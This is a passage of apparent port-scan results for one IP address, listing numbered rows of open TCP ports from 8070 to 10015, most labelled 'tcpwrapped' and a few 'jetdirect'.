6275149.126.72.220 8070 tcp tcpwrapped open
6276149.126.72.220 8071 tcp tcpwrapped open
6277149.126.72.220 8072 tcp tcpwrapped open
6278149.126.72.220 8074 tcp tcpwrapped open
6279149.126.72.220 8079 tcp tcpwrapped open
6280149.126.72.220 8080 tcp tcpwrapped open
6281149.126.72.220 8081 tcp tcpwrapped open
6282149.126.72.220 8082 tcp tcpwrapped open
6283149.126.72.220 8083 tcp tcpwrapped open
6284149.126.72.220 8084 tcp tcpwrapped open
6285149.126.72.220 8085 tcp tcpwrapped open
6286149.126.72.220 8086 tcp tcpwrapped open
6287149.126.72.220 8087 tcp tcpwrapped open
6288149.126.72.220 8088 tcp tcpwrapped open
6289149.126.72.220 8089 tcp tcpwrapped open
6290149.126.72.220 8090 tcp tcpwrapped open
6291149.126.72.220 8091 tcp tcpwrapped open
6292149.126.72.220 8092 tcp tcpwrapped open
6293149.126.72.220 8093 tcp tcpwrapped open
6294149.126.72.220 8094 tcp tcpwrapped open
6295149.126.72.220 8095 tcp tcpwrapped open
6296149.126.72.220 8096 tcp tcpwrapped open
6297149.126.72.220 8097 tcp tcpwrapped open
6298149.126.72.220 8098 tcp tcpwrapped open
6299149.126.72.220 8099 tcp tcpwrapped open
6300149.126.72.220 8100 tcp tcpwrapped open
6301149.126.72.220 8101 tcp tcpwrapped open
6302149.126.72.220 8102 tcp tcpwrapped open
6303149.126.72.220 8103 tcp tcpwrapped open
6304149.126.72.220 8104 tcp tcpwrapped open
6305149.126.72.220 8105 tcp tcpwrapped open
6306149.126.72.220 8106 tcp tcpwrapped open
6307149.126.72.220 8107 tcp tcpwrapped open
6308149.126.72.220 8108 tcp tcpwrapped open
6309149.126.72.220 8109 tcp tcpwrapped open
6310149.126.72.220 8110 tcp tcpwrapped open
6311149.126.72.220 8113 tcp tcpwrapped open
6312149.126.72.220 8114 tcp tcpwrapped open
6313149.126.72.220 8115 tcp tcpwrapped open
6314149.126.72.220 8118 tcp tcpwrapped open
6315149.126.72.220 8119 tcp tcpwrapped open
6316149.126.72.220 8120 tcp tcpwrapped open
6317149.126.72.220 8121 tcp tcpwrapped open
6318149.126.72.220 8123 tcp tcpwrapped open
6319149.126.72.220 8125 tcp tcpwrapped open
6320149.126.72.220 8126 tcp tcpwrapped open
6321149.126.72.220 8128 tcp tcpwrapped open
6322149.126.72.220 8129 tcp tcpwrapped open
6323149.126.72.220 8130 tcp tcpwrapped open
6324149.126.72.220 8131 tcp tcpwrapped open
6325149.126.72.220 8132 tcp tcpwrapped open
6326149.126.72.220 8133 tcp tcpwrapped open
6327149.126.72.220 8136 tcp tcpwrapped open
6328149.126.72.220 8140 tcp tcpwrapped open
6329149.126.72.220 8142 tcp tcpwrapped open
6330149.126.72.220 8143 tcp tcpwrapped open
6331149.126.72.220 8144 tcp tcpwrapped open
6332149.126.72.220 8147 tcp tcpwrapped open
6333149.126.72.220 8148 tcp tcpwrapped open
6334149.126.72.220 8149 tcp tcpwrapped open
6335149.126.72.220 8150 tcp tcpwrapped open
6336149.126.72.220 8154 tcp tcpwrapped open
6337149.126.72.220 8156 tcp tcpwrapped open
6338149.126.72.220 8157 tcp tcpwrapped open
6339149.126.72.220 8158 tcp tcpwrapped open
6340149.126.72.220 8160 tcp tcpwrapped open
6341149.126.72.220 8161 tcp tcpwrapped open
6342149.126.72.220 8162 tcp tcpwrapped open
6343149.126.72.220 8163 tcp tcpwrapped open
6344149.126.72.220 8164 tcp tcpwrapped open
6345149.126.72.220 8165 tcp tcpwrapped open
6346149.126.72.220 8166 tcp tcpwrapped open
6347149.126.72.220 8167 tcp tcpwrapped open
6348149.126.72.220 8168 tcp tcpwrapped open
6349149.126.72.220 8169 tcp tcpwrapped open
6350149.126.72.220 8170 tcp tcpwrapped open
6351149.126.72.220 8171 tcp tcpwrapped open
6352149.126.72.220 8172 tcp tcpwrapped open
6353149.126.72.220 8173 tcp tcpwrapped open
6354149.126.72.220 8175 tcp tcpwrapped open
6355149.126.72.220 8176 tcp tcpwrapped open
6356149.126.72.220 8178 tcp tcpwrapped open
6357149.126.72.220 8179 tcp tcpwrapped open
6358149.126.72.220 8180 tcp tcpwrapped open
6359149.126.72.220 8181 tcp tcpwrapped open
6360149.126.72.220 8182 tcp tcpwrapped open
6361149.126.72.220 8183 tcp tcpwrapped open
6362149.126.72.220 8184 tcp tcpwrapped open
6363149.126.72.220 8185 tcp tcpwrapped open
6364149.126.72.220 8186 tcp tcpwrapped open
6365149.126.72.220 8187 tcp tcpwrapped open
6366149.126.72.220 8188 tcp tcpwrapped open
6367149.126.72.220 8189 tcp tcpwrapped open
6368149.126.72.220 8190 tcp tcpwrapped open
6369149.126.72.220 8191 tcp tcpwrapped open
6370149.126.72.220 8192 tcp tcpwrapped open
6371149.126.72.220 8193 tcp tcpwrapped open
6372149.126.72.220 8194 tcp tcpwrapped open
6373149.126.72.220 8195 tcp tcpwrapped open
6374149.126.72.220 8198 tcp tcpwrapped open
6375149.126.72.220 8199 tcp tcpwrapped open
6376149.126.72.220 8200 tcp tcpwrapped open
6377149.126.72.220 8203 tcp tcpwrapped open
6378149.126.72.220 8222 tcp tcpwrapped open
6379149.126.72.220 8230 tcp tcpwrapped open
6380149.126.72.220 8236 tcp tcpwrapped open
6381149.126.72.220 8237 tcp tcpwrapped open
6382149.126.72.220 8238 tcp tcpwrapped open
6383149.126.72.220 8239 tcp tcpwrapped open
6384149.126.72.220 8241 tcp tcpwrapped open
6385149.126.72.220 8243 tcp tcpwrapped open
6386149.126.72.220 8248 tcp tcpwrapped open
6387149.126.72.220 8249 tcp tcpwrapped open
6388149.126.72.220 8250 tcp tcpwrapped open
6389149.126.72.220 8251 tcp tcpwrapped open
6390149.126.72.220 8252 tcp tcpwrapped open
6391149.126.72.220 8280 tcp tcpwrapped open
6392149.126.72.220 8282 tcp tcpwrapped open
6393149.126.72.220 8333 tcp tcpwrapped open
6394149.126.72.220 8340 tcp tcpwrapped open
6395149.126.72.220 8343 tcp tcpwrapped open
6396149.126.72.220 8350 tcp tcpwrapped open
6397149.126.72.220 8381 tcp tcpwrapped open
6398149.126.72.220 8382 tcp tcpwrapped open
6399149.126.72.220 8383 tcp tcpwrapped open
6400149.126.72.220 8384 tcp tcpwrapped open
6401149.126.72.220 8385 tcp tcpwrapped open
6402149.126.72.220 8388 tcp tcpwrapped open
6403149.126.72.220 8393 tcp tcpwrapped open
6404149.126.72.220 8401 tcp tcpwrapped open
6405149.126.72.220 8402 tcp tcpwrapped open
6406149.126.72.220 8403 tcp tcpwrapped open
6407149.126.72.220 8404 tcp tcpwrapped open
6408149.126.72.220 8405 tcp tcpwrapped open
6409149.126.72.220 8406 tcp tcpwrapped open
6410149.126.72.220 8407 tcp tcpwrapped open
6411149.126.72.220 8408 tcp tcpwrapped open
6412149.126.72.220 8409 tcp tcpwrapped open
6413149.126.72.220 8410 tcp tcpwrapped open
6414149.126.72.220 8411 tcp tcpwrapped open
6415149.126.72.220 8412 tcp tcpwrapped open
6416149.126.72.220 8413 tcp tcpwrapped open
6417149.126.72.220 8414 tcp tcpwrapped open
6418149.126.72.220 8415 tcp tcpwrapped open
6419149.126.72.220 8416 tcp tcpwrapped open
6420149.126.72.220 8417 tcp tcpwrapped open
6421149.126.72.220 8418 tcp tcpwrapped open
6422149.126.72.220 8419 tcp tcpwrapped open
6423149.126.72.220 8420 tcp tcpwrapped open
6424149.126.72.220 8421 tcp tcpwrapped open
6425149.126.72.220 8422 tcp tcpwrapped open
6426149.126.72.220 8423 tcp tcpwrapped open
6427149.126.72.220 8424 tcp tcpwrapped open
6428149.126.72.220 8425 tcp tcpwrapped open
6429149.126.72.220 8426 tcp tcpwrapped open
6430149.126.72.220 8427 tcp tcpwrapped open
6431149.126.72.220 8428 tcp tcpwrapped open
6432149.126.72.220 8429 tcp tcpwrapped open
6433149.126.72.220 8430 tcp tcpwrapped open
6434149.126.72.220 8431 tcp tcpwrapped open
6435149.126.72.220 8432 tcp tcpwrapped open
6436149.126.72.220 8433 tcp tcpwrapped open
6437149.126.72.220 8435 tcp tcpwrapped open
6438149.126.72.220 8440 tcp tcpwrapped open
6439149.126.72.220 8441 tcp tcpwrapped open
6440149.126.72.220 8442 tcp tcpwrapped open
6441149.126.72.220 8443 tcp tcpwrapped open
6442149.126.72.220 8444 tcp tcpwrapped open
6443149.126.72.220 8445 tcp tcpwrapped open
6444149.126.72.220 8446 tcp tcpwrapped open
6445149.126.72.220 8447 tcp tcpwrapped open
6446149.126.72.220 8448 tcp tcpwrapped open
6447149.126.72.220 8449 tcp tcpwrapped open
6448149.126.72.220 8450 tcp tcpwrapped open
6449149.126.72.220 8451 tcp tcpwrapped open
6450149.126.72.220 8452 tcp tcpwrapped open
6451149.126.72.220 8453 tcp tcpwrapped open
6452149.126.72.220 8454 tcp tcpwrapped open
6453149.126.72.220 8455 tcp tcpwrapped open
6454149.126.72.220 8456 tcp tcpwrapped open
6455149.126.72.220 8457 tcp tcpwrapped open
6456149.126.72.220 8458 tcp tcpwrapped open
6457149.126.72.220 8459 tcp tcpwrapped open
6458149.126.72.220 8460 tcp tcpwrapped open
6459149.126.72.220 8461 tcp tcpwrapped open
6460149.126.72.220 8462 tcp tcpwrapped open
6461149.126.72.220 8463 tcp tcpwrapped open
6462149.126.72.220 8464 tcp tcpwrapped open
6463149.126.72.220 8465 tcp tcpwrapped open
6464149.126.72.220 8466 tcp tcpwrapped open
6465149.126.72.220 8467 tcp tcpwrapped open
6466149.126.72.220 8470 tcp tcpwrapped open
6467149.126.72.220 8472 tcp tcpwrapped open
6468149.126.72.220 8473 tcp tcpwrapped open
6469149.126.72.220 8475 tcp tcpwrapped open
6470149.126.72.220 8480 tcp tcpwrapped open
6471149.126.72.220 8481 tcp tcpwrapped open
6472149.126.72.220 8482 tcp tcpwrapped open
6473149.126.72.220 8484 tcp tcpwrapped open
6474149.126.72.220 8485 tcp tcpwrapped open
6475149.126.72.220 8488 tcp tcpwrapped open
6476149.126.72.220 8493 tcp tcpwrapped open
6477149.126.72.220 8494 tcp tcpwrapped open
6478149.126.72.220 8500 tcp tcpwrapped open
6479149.126.72.220 8502 tcp tcpwrapped open
6480149.126.72.220 8503 tcp tcpwrapped open
6481149.126.72.220 8504 tcp tcpwrapped open
6482149.126.72.220 8505 tcp tcpwrapped open
6483149.126.72.220 8506 tcp tcpwrapped open
6484149.126.72.220 8510 tcp tcpwrapped open
6485149.126.72.220 8513 tcp tcpwrapped open
6486149.126.72.220 8514 tcp tcpwrapped open
6487149.126.72.220 8515 tcp tcpwrapped open
6488149.126.72.220 8519 tcp tcpwrapped open
6489149.126.72.220 8520 tcp tcpwrapped open
6490149.126.72.220 8521 tcp tcpwrapped open
6491149.126.72.220 8523 tcp tcpwrapped open
6492149.126.72.220 8524 tcp tcpwrapped open
6493149.126.72.220 8525 tcp tcpwrapped open
6494149.126.72.220 8526 tcp tcpwrapped open
6495149.126.72.220 8528 tcp tcpwrapped open
6496149.126.72.220 8529 tcp tcpwrapped open
6497149.126.72.220 8530 tcp tcpwrapped open
6498149.126.72.220 8531 tcp tcpwrapped open
6499149.126.72.220 8532 tcp tcpwrapped open
6500149.126.72.220 8533 tcp tcpwrapped open
6501149.126.72.220 8536 tcp tcpwrapped open
6502149.126.72.220 8540 tcp tcpwrapped open
6503149.126.72.220 8543 tcp tcpwrapped open
6504149.126.72.220 8544 tcp tcpwrapped open
6505149.126.72.220 8548 tcp tcpwrapped open
6506149.126.72.220 8549 tcp tcpwrapped open
6507149.126.72.220 8550 tcp tcpwrapped open
6508149.126.72.220 8551 tcp tcpwrapped open
6509149.126.72.220 8553 tcp tcpwrapped open
6510149.126.72.220 8556 tcp tcpwrapped open
6511149.126.72.220 8557 tcp tcpwrapped open
6512149.126.72.220 8558 tcp tcpwrapped open
6513149.126.72.220 8560 tcp tcpwrapped open
6514149.126.72.220 8561 tcp tcpwrapped open
6515149.126.72.220 8562 tcp tcpwrapped open
6516149.126.72.220 8563 tcp tcpwrapped open
6517149.126.72.220 8564 tcp tcpwrapped open
6518149.126.72.220 8565 tcp tcpwrapped open
6519149.126.72.220 8566 tcp tcpwrapped open
6520149.126.72.220 8567 tcp tcpwrapped open
6521149.126.72.220 8568 tcp tcpwrapped open
6522149.126.72.220 8569 tcp tcpwrapped open
6523149.126.72.220 8570 tcp tcpwrapped open
6524149.126.72.220 8571 tcp tcpwrapped open
6525149.126.72.220 8573 tcp tcpwrapped open
6526149.126.72.220 8574 tcp tcpwrapped open
6527149.126.72.220 8575 tcp tcpwrapped open
6528149.126.72.220 8576 tcp tcpwrapped open
6529149.126.72.220 8577 tcp tcpwrapped open
6530149.126.72.220 8578 tcp tcpwrapped open
6531149.126.72.220 8579 tcp tcpwrapped open
6532149.126.72.220 8580 tcp tcpwrapped open
6533149.126.72.220 8581 tcp tcpwrapped open
6534149.126.72.220 8582 tcp tcpwrapped open
6535149.126.72.220 8583 tcp tcpwrapped open
6536149.126.72.220 8585 tcp tcpwrapped open
6537149.126.72.220 8586 tcp tcpwrapped open
6538149.126.72.220 8588 tcp tcpwrapped open
6539149.126.72.220 8589 tcp tcpwrapped open
6540149.126.72.220 8590 tcp tcpwrapped open
6541149.126.72.220 8591 tcp tcpwrapped open
6542149.126.72.220 8592 tcp tcpwrapped open
6543149.126.72.220 8593 tcp tcpwrapped open
6544149.126.72.220 8594 tcp tcpwrapped open
6545149.126.72.220 8595 tcp tcpwrapped open
6546149.126.72.220 8596 tcp tcpwrapped open
6547149.126.72.220 8597 tcp tcpwrapped open
6548149.126.72.220 8598 tcp tcpwrapped open
6549149.126.72.220 8599 tcp tcpwrapped open
6550149.126.72.220 8600 tcp tcpwrapped open
6551149.126.72.220 8601 tcp tcpwrapped open
6552149.126.72.220 8605 tcp tcpwrapped open
6553149.126.72.220 8606 tcp tcpwrapped open
6554149.126.72.220 8630 tcp tcpwrapped open
6555149.126.72.220 8640 tcp tcpwrapped open
6556149.126.72.220 8641 tcp tcpwrapped open
6557149.126.72.220 8643 tcp tcpwrapped open
6558149.126.72.220 8663 tcp tcpwrapped open
6559149.126.72.220 8666 tcp tcpwrapped open
6560149.126.72.220 8686 tcp tcpwrapped open
6561149.126.72.220 8688 tcp tcpwrapped open
6562149.126.72.220 8700 tcp tcpwrapped open
6563149.126.72.220 8701 tcp tcpwrapped open
6564149.126.72.220 8702 tcp tcpwrapped open
6565149.126.72.220 8703 tcp tcpwrapped open
6566149.126.72.220 8704 tcp tcpwrapped open
6567149.126.72.220 8705 tcp tcpwrapped open
6568149.126.72.220 8706 tcp tcpwrapped open
6569149.126.72.220 8707 tcp tcpwrapped open
6570149.126.72.220 8708 tcp tcpwrapped open
6571149.126.72.220 8709 tcp tcpwrapped open
6572149.126.72.220 8723 tcp tcpwrapped open
6573149.126.72.220 8724 tcp tcpwrapped open
6574149.126.72.220 8731 tcp tcpwrapped open
6575149.126.72.220 8732 tcp tcpwrapped open
6576149.126.72.220 8764 tcp tcpwrapped open
6577149.126.72.220 8765 tcp tcpwrapped open
6578149.126.72.220 8766 tcp tcpwrapped open
6579149.126.72.220 8767 tcp tcpwrapped open
6580149.126.72.220 8771 tcp tcpwrapped open
6581149.126.72.220 8787 tcp tcpwrapped open
6582149.126.72.220 8788 tcp tcpwrapped open
6583149.126.72.220 8789 tcp tcpwrapped open
6584149.126.72.220 8790 tcp tcpwrapped open
6585149.126.72.220 8791 tcp tcpwrapped open
6586149.126.72.220 8800 tcp tcpwrapped open
6587149.126.72.220 8801 tcp tcpwrapped open
6588149.126.72.220 8802 tcp tcpwrapped open
6589149.126.72.220 8803 tcp tcpwrapped open
6590149.126.72.220 8804 tcp tcpwrapped open
6591149.126.72.220 8805 tcp tcpwrapped open
6592149.126.72.220 8806 tcp tcpwrapped open
6593149.126.72.220 8807 tcp tcpwrapped open
6594149.126.72.220 8808 tcp tcpwrapped open
6595149.126.72.220 8809 tcp tcpwrapped open
6596149.126.72.220 8810 tcp tcpwrapped open
6597149.126.72.220 8811 tcp tcpwrapped open
6598149.126.72.220 8812 tcp tcpwrapped open
6599149.126.72.220 8813 tcp tcpwrapped open
6600149.126.72.220 8814 tcp tcpwrapped open
6601149.126.72.220 8815 tcp tcpwrapped open
6602149.126.72.220 8816 tcp tcpwrapped open
6603149.126.72.220 8817 tcp tcpwrapped open
6604149.126.72.220 8818 tcp tcpwrapped open
6605149.126.72.220 8819 tcp tcpwrapped open
6606149.126.72.220 8820 tcp tcpwrapped open
6607149.126.72.220 8821 tcp tcpwrapped open
6608149.126.72.220 8822 tcp tcpwrapped open
6609149.126.72.220 8823 tcp tcpwrapped open
6610149.126.72.220 8824 tcp tcpwrapped open
6611149.126.72.220 8825 tcp tcpwrapped open
6612149.126.72.220 8826 tcp tcpwrapped open
6613149.126.72.220 8827 tcp tcpwrapped open
6614149.126.72.220 8828 tcp tcpwrapped open
6615149.126.72.220 8829 tcp tcpwrapped open
6616149.126.72.220 8830 tcp tcpwrapped open
6617149.126.72.220 8831 tcp tcpwrapped open
6618149.126.72.220 8832 tcp tcpwrapped open
6619149.126.72.220 8833 tcp tcpwrapped open
6620149.126.72.220 8834 tcp tcpwrapped open
6621149.126.72.220 8835 tcp tcpwrapped open
6622149.126.72.220 8836 tcp tcpwrapped open
6623149.126.72.220 8837 tcp tcpwrapped open
6624149.126.72.220 8838 tcp tcpwrapped open
6625149.126.72.220 8839 tcp tcpwrapped open
6626149.126.72.220 8840 tcp tcpwrapped open
6627149.126.72.220 8841 tcp tcpwrapped open
6628149.126.72.220 8842 tcp tcpwrapped open
6629149.126.72.220 8843 tcp tcpwrapped open
6630149.126.72.220 8844 tcp tcpwrapped open
6631149.126.72.220 8845 tcp tcpwrapped open
6632149.126.72.220 8846 tcp tcpwrapped open
6633149.126.72.220 8847 tcp tcpwrapped open
6634149.126.72.220 8848 tcp tcpwrapped open
6635149.126.72.220 8849 tcp tcpwrapped open
6636149.126.72.220 8850 tcp tcpwrapped open
6637149.126.72.220 8851 tcp tcpwrapped open
6638149.126.72.220 8852 tcp tcpwrapped open
6639149.126.72.220 8853 tcp tcpwrapped open
6640149.126.72.220 8854 tcp tcpwrapped open
6641149.126.72.220 8855 tcp tcpwrapped open
6642149.126.72.220 8856 tcp tcpwrapped open
6643149.126.72.220 8857 tcp tcpwrapped open
6644149.126.72.220 8858 tcp tcpwrapped open
6645149.126.72.220 8859 tcp tcpwrapped open
6646149.126.72.220 8860 tcp tcpwrapped open
6647149.126.72.220 8861 tcp tcpwrapped open
6648149.126.72.220 8862 tcp tcpwrapped open
6649149.126.72.220 8863 tcp tcpwrapped open
6650149.126.72.220 8864 tcp tcpwrapped open
6651149.126.72.220 8865 tcp tcpwrapped open
6652149.126.72.220 8866 tcp tcpwrapped open
6653149.126.72.220 8867 tcp tcpwrapped open
6654149.126.72.220 8868 tcp tcpwrapped open
6655149.126.72.220 8869 tcp tcpwrapped open
6656149.126.72.220 8870 tcp tcpwrapped open
6657149.126.72.220 8871 tcp tcpwrapped open
6658149.126.72.220 8872 tcp tcpwrapped open
6659149.126.72.220 8873 tcp tcpwrapped open
6660149.126.72.220 8874 tcp tcpwrapped open
6661149.126.72.220 8875 tcp tcpwrapped open
6662149.126.72.220 8876 tcp tcpwrapped open
6663149.126.72.220 8877 tcp tcpwrapped open
6664149.126.72.220 8878 tcp tcpwrapped open
6665149.126.72.220 8879 tcp tcpwrapped open
6666149.126.72.220 8880 tcp tcpwrapped open
6667149.126.72.220 8881 tcp tcpwrapped open
6668149.126.72.220 8882 tcp tcpwrapped open
6669149.126.72.220 8883 tcp tcpwrapped open
6670149.126.72.220 8884 tcp tcpwrapped open
6671149.126.72.220 8885 tcp tcpwrapped open
6672149.126.72.220 8887 tcp tcpwrapped open
6673149.126.72.220 8888 tcp tcpwrapped open
6674149.126.72.220 8889 tcp tcpwrapped open
6675149.126.72.220 8890 tcp tcpwrapped open
6676149.126.72.220 8891 tcp tcpwrapped open
6677149.126.72.220 8899 tcp tcpwrapped open
6678149.126.72.220 8900 tcp tcpwrapped open
6679149.126.72.220 8901 tcp tcpwrapped open
6680149.126.72.220 8902 tcp tcpwrapped open
6681149.126.72.220 8905 tcp tcpwrapped open
6682149.126.72.220 8906 tcp tcpwrapped open
6683149.126.72.220 8907 tcp tcpwrapped open
6684149.126.72.220 8908 tcp tcpwrapped open
6685149.126.72.220 8910 tcp tcpwrapped open
6686149.126.72.220 8911 tcp tcpwrapped open
6687149.126.72.220 8912 tcp tcpwrapped open
6688149.126.72.220 8913 tcp tcpwrapped open
6689149.126.72.220 8915 tcp tcpwrapped open
6690149.126.72.220 8916 tcp tcpwrapped open
6691149.126.72.220 8935 tcp tcpwrapped open
6692149.126.72.220 8943 tcp tcpwrapped open
6693149.126.72.220 8969 tcp tcpwrapped open
6694149.126.72.220 8988 tcp tcpwrapped open
6695149.126.72.220 8989 tcp tcpwrapped open
6696149.126.72.220 8999 tcp tcpwrapped open
6697149.126.72.220 9000 tcp tcpwrapped open
6698149.126.72.220 9001 tcp tcpwrapped open
6699149.126.72.220 9002 tcp tcpwrapped open
6700149.126.72.220 9003 tcp tcpwrapped open
6701149.126.72.220 9004 tcp tcpwrapped open
6702149.126.72.220 9005 tcp tcpwrapped open
6703149.126.72.220 9006 tcp tcpwrapped open
6704149.126.72.220 9007 tcp tcpwrapped open
6705149.126.72.220 9008 tcp tcpwrapped open
6706149.126.72.220 9009 tcp tcpwrapped open
6707149.126.72.220 9010 tcp tcpwrapped open
6708149.126.72.220 9011 tcp tcpwrapped open
6709149.126.72.220 9012 tcp tcpwrapped open
6710149.126.72.220 9013 tcp tcpwrapped open
6711149.126.72.220 9014 tcp tcpwrapped open
6712149.126.72.220 9015 tcp tcpwrapped open
6713149.126.72.220 9016 tcp tcpwrapped open
6714149.126.72.220 9017 tcp tcpwrapped open
6715149.126.72.220 9018 tcp tcpwrapped open
6716149.126.72.220 9019 tcp tcpwrapped open
6717149.126.72.220 9020 tcp tcpwrapped open
6718149.126.72.220 9021 tcp tcpwrapped open
6719149.126.72.220 9022 tcp tcpwrapped open
6720149.126.72.220 9023 tcp tcpwrapped open
6721149.126.72.220 9024 tcp tcpwrapped open
6722149.126.72.220 9025 tcp tcpwrapped open
6723149.126.72.220 9026 tcp tcpwrapped open
6724149.126.72.220 9027 tcp tcpwrapped open
6725149.126.72.220 9028 tcp tcpwrapped open
6726149.126.72.220 9029 tcp tcpwrapped open
6727149.126.72.220 9030 tcp tcpwrapped open
6728149.126.72.220 9031 tcp tcpwrapped open
6729149.126.72.220 9032 tcp tcpwrapped open
6730149.126.72.220 9033 tcp tcpwrapped open
6731149.126.72.220 9034 tcp tcpwrapped open
6732149.126.72.220 9035 tcp tcpwrapped open
6733149.126.72.220 9036 tcp tcpwrapped open
6734149.126.72.220 9037 tcp tcpwrapped open
6735149.126.72.220 9038 tcp tcpwrapped open
6736149.126.72.220 9039 tcp tcpwrapped open
6737149.126.72.220 9040 tcp tcpwrapped open
6738149.126.72.220 9041 tcp tcpwrapped open
6739149.126.72.220 9042 tcp tcpwrapped open
6740149.126.72.220 9043 tcp tcpwrapped open
6741149.126.72.220 9044 tcp tcpwrapped open
6742149.126.72.220 9045 tcp tcpwrapped open
6743149.126.72.220 9046 tcp tcpwrapped open
6744149.126.72.220 9047 tcp tcpwrapped open
6745149.126.72.220 9048 tcp tcpwrapped open
6746149.126.72.220 9049 tcp tcpwrapped open
6747149.126.72.220 9050 tcp tcpwrapped open
6748149.126.72.220 9051 tcp tcpwrapped open
6749149.126.72.220 9052 tcp tcpwrapped open
6750149.126.72.220 9058 tcp tcpwrapped open
6751149.126.72.220 9060 tcp tcpwrapped open
6752149.126.72.220 9061 tcp tcpwrapped open
6753149.126.72.220 9070 tcp tcpwrapped open
6754149.126.72.220 9080 tcp tcpwrapped open
6755149.126.72.220 9081 tcp tcpwrapped open
6756149.126.72.220 9082 tcp tcpwrapped open
6757149.126.72.220 9084 tcp tcpwrapped open
6758149.126.72.220 9085 tcp tcpwrapped open
6759149.126.72.220 9086 tcp tcpwrapped open
6760149.126.72.220 9088 tcp tcpwrapped open
6761149.126.72.220 9089 tcp tcpwrapped open
6762149.126.72.220 9090 tcp tcpwrapped open
6763149.126.72.220 9091 tcp tcpwrapped open
6764149.126.72.220 9092 tcp tcpwrapped open
6765149.126.72.220 9093 tcp tcpwrapped open
6766149.126.72.220 9094 tcp tcpwrapped open
6767149.126.72.220 9095 tcp tcpwrapped open
6768149.126.72.220 9096 tcp tcpwrapped open
6769149.126.72.220 9097 tcp tcpwrapped open
6770149.126.72.220 9098 tcp tcpwrapped open
6771149.126.72.220 9099 tcp tcpwrapped open
6772149.126.72.220 9100 tcp jetdirect open
6773149.126.72.220 9101 tcp jetdirect open
6774149.126.72.220 9102 tcp jetdirect open
6775149.126.72.220 9103 tcp jetdirect open
6776149.126.72.220 9104 tcp jetdirect open
6777149.126.72.220 9105 tcp jetdirect open
6778149.126.72.220 9106 tcp jetdirect open
6779149.126.72.220 9107 tcp jetdirect open
6780149.126.72.220 9108 tcp tcpwrapped open
6781149.126.72.220 9109 tcp tcpwrapped open
6782149.126.72.220 9110 tcp tcpwrapped open
6783149.126.72.220 9111 tcp tcpwrapped open
6784149.126.72.220 9136 tcp tcpwrapped open
6785149.126.72.220 9143 tcp tcpwrapped open
6786149.126.72.220 9189 tcp tcpwrapped open
6787149.126.72.220 9199 tcp tcpwrapped open
6788149.126.72.220 9200 tcp tcpwrapped open
6789149.126.72.220 9201 tcp tcpwrapped open
6790149.126.72.220 9202 tcp tcpwrapped open
6791149.126.72.220 9203 tcp tcpwrapped open
6792149.126.72.220 9204 tcp tcpwrapped open
6793149.126.72.220 9205 tcp tcpwrapped open
6794149.126.72.220 9206 tcp tcpwrapped open
6795149.126.72.220 9207 tcp tcpwrapped open
6796149.126.72.220 9208 tcp tcpwrapped open
6797149.126.72.220 9209 tcp tcpwrapped open
6798149.126.72.220 9210 tcp tcpwrapped open
6799149.126.72.220 9211 tcp tcpwrapped open
6800149.126.72.220 9212 tcp tcpwrapped open
6801149.126.72.220 9213 tcp tcpwrapped open
6802149.126.72.220 9214 tcp tcpwrapped open
6803149.126.72.220 9215 tcp tcpwrapped open
6804149.126.72.220 9216 tcp tcpwrapped open
6805149.126.72.220 9217 tcp tcpwrapped open
6806149.126.72.220 9218 tcp tcpwrapped open
6807149.126.72.220 9219 tcp tcpwrapped open
6808149.126.72.220 9220 tcp tcpwrapped open
6809149.126.72.220 9221 tcp tcpwrapped open
6810149.126.72.220 9236 tcp tcpwrapped open
6811149.126.72.220 9251 tcp tcpwrapped open
6812149.126.72.220 9289 tcp tcpwrapped open
6813149.126.72.220 9299 tcp tcpwrapped open
6814149.126.72.220 9300 tcp tcpwrapped open
6815149.126.72.220 9301 tcp tcpwrapped open
6816149.126.72.220 9302 tcp tcpwrapped open
6817149.126.72.220 9303 tcp tcpwrapped open
6818149.126.72.220 9304 tcp tcpwrapped open
6819149.126.72.220 9305 tcp tcpwrapped open
6820149.126.72.220 9306 tcp tcpwrapped open
6821149.126.72.220 9307 tcp tcpwrapped open
6822149.126.72.220 9308 tcp tcpwrapped open
6823149.126.72.220 9309 tcp tcpwrapped open
6824149.126.72.220 9310 tcp tcpwrapped open
6825149.126.72.220 9311 tcp tcpwrapped open
6826149.126.72.220 9350 tcp tcpwrapped open
6827149.126.72.220 9383 tcp tcpwrapped open
6828149.126.72.220 9387 tcp tcpwrapped open
6829149.126.72.220 9389 tcp tcpwrapped open
6830149.126.72.220 9433 tcp tcpwrapped open
6831149.126.72.220 9443 tcp tcpwrapped open
6832149.126.72.220 9444 tcp tcpwrapped open
6833149.126.72.220 9446 tcp tcpwrapped open
6834149.126.72.220 9447 tcp tcpwrapped open
6835149.126.72.220 9500 tcp tcpwrapped open
6836149.126.72.220 9510 tcp tcpwrapped open
6837149.126.72.220 9530 tcp tcpwrapped open
6838149.126.72.220 9550 tcp tcpwrapped open
6839149.126.72.220 9600 tcp tcpwrapped open
6840149.126.72.220 9663 tcp tcpwrapped open
6841149.126.72.220 9690 tcp tcpwrapped open
6842149.126.72.220 9704 tcp tcpwrapped open
6843149.126.72.220 9710 tcp tcpwrapped open
6844149.126.72.220 9711 tcp tcpwrapped open
6845149.126.72.220 9765 tcp tcpwrapped open
6846149.126.72.220 9773 tcp tcpwrapped open
6847149.126.72.220 9779 tcp tcpwrapped open
6848149.126.72.220 9800 tcp tcpwrapped open
6849149.126.72.220 9803 tcp tcpwrapped open
6850149.126.72.220 9804 tcp tcpwrapped open
6851149.126.72.220 9950 tcp tcpwrapped open
6852149.126.72.220 9991 tcp tcpwrapped open
6853149.126.72.220 9992 tcp tcpwrapped open
6854149.126.72.220 9993 tcp tcpwrapped open
6855149.126.72.220 9994 tcp tcpwrapped open
6856149.126.72.220 9997 tcp tcpwrapped open
6857149.126.72.220 9998 tcp tcpwrapped open
6858149.126.72.220 9999 tcp tcpwrapped open
6859149.126.72.220 10000 tcp tcpwrapped open
6860149.126.72.220 10001 tcp tcpwrapped open
6861149.126.72.220 10002 tcp tcpwrapped open
6862149.126.72.220 10003 tcp tcpwrapped open
6863149.126.72.220 10004 tcp tcpwrapped open
6864149.126.72.220 10005 tcp tcpwrapped open
6865149.126.72.220 10006 tcp tcpwrapped open
6866149.126.72.220 10007 tcp tcpwrapped open
6867149.126.72.220 10008 tcp tcpwrapped open
6868149.126.72.220 10009 tcp tcpwrapped open
6869149.126.72.220 10010 tcp tcpwrapped open
6870149.126.72.220 10011 tcp tcpwrapped open
6871149.126.72.220 10012 tcp tcpwrapped open
6872149.126.72.220 10013 tcp tcpwrapped open
6873149.126.72.220 10014 tcp tcpwrapped open
6874149.126.72.220 10015 tcp tcpwrapped open
